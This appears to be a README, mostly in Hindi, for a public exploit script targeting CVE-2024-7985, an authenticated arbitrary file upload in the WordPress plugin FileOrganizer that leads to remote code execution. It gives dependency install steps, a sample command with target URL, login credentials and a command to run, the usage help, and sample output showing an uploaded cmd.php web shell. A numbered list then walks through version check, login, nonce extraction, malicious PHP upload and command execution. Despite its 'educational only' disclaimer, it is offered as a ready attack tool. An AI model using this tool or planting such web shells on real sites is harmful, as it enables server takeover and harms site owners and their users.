
FileOrganizer <= 1.0.9 - प्रमाणित (सब्सक्राइबर+) मनमाना फ़ाइल अपलोड
FileOrganizer <= 1.0.9 - प्रमाणित (Subscriber+) मनमाना फ़ाइल अपलोड
CVE-2024-7985 - WordPress प्लगिन FileOrganizer <= 1.0.9 प्रमाणित मनमाना फ़ाइल अपलोड के लिए संवेदनशील है, जिससे Subscriber+ विशेषाधिकार वाले हमलावर दूरस्थ रूप से दुर्भावनापूर्ण फ़ाइलें अपलोड और निष्पादित कर सकते हैं। यह कमज़ोरी fileorganizer_ajax_handler फ़ंक्शन में फ़ाइल प्रकार सत्यापन की कमी के कारण उत्पन्न होती है, जिससे दूरस्थ कोड निष्पादन (RCE) संभव होता है।
🚨 यह शोषण हमलावरों को सर्वर पर मनमाने आदेश निष्पादित करने की अनुमति देता है! 🚨
requestsbeautifulsoup4निर्भरताएँ स्थापित करें:
pip install requests beautifulsoup4
python CVE-2024-7985.py --url "http://target-site.com/wordpress" --username "admin" --password "admin" --cmd "whoami"
usage: CVE-2024-7985.py [-h] --url URL --username USERNAME --password PASSWORD [--cmd CMD]
FileOrganizer <= 1.0.9 - Authenticated (Subscriber+) Arbitrary File Upload by | Nxploit Khaled_alenazi
options:
-h, --help show this help message and exit
--url URL Target WordPress site URL
--username USERNAME WordPress Username
--password PASSWORD WordPress Password
--cmd CMD Command to execute in uploaded file
[+] Vulnerable version detected: 1.0.9
[+] Logged in successfully!
[+] Extracted nonce: 7b4a95872b
[+] File uploaded successfully!
[+] Access file at: http://target-site.com/wordpress/wp-content/uploads/fileorganizer/cmd.php?cmd=whoami
1️⃣ संस्करण जाँच - निर्धारित करता है कि साइट संवेदनशील है या नहीं।
2️⃣ प्रमाणीकरण - WordPress में लॉगिन करता है।
3️⃣ Nonce निष्कर्षण - सुरक्षा टोकन प्राप्त करता है।
4️⃣ फ़ाइल अपलोड - एक दुर्भावनापूर्ण PHP स्क्रिप्ट अपलोड करता है।
5️⃣ कमांड निष्पादन - उपयोगकर्ता द्वारा निर्दिष्ट कमांड निष्पादित करता है।
यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है; लेखक किसी भी दुरुपयोग या परिणामों के लिए कोई जिम्मेदारी नहीं लेता है। 🚨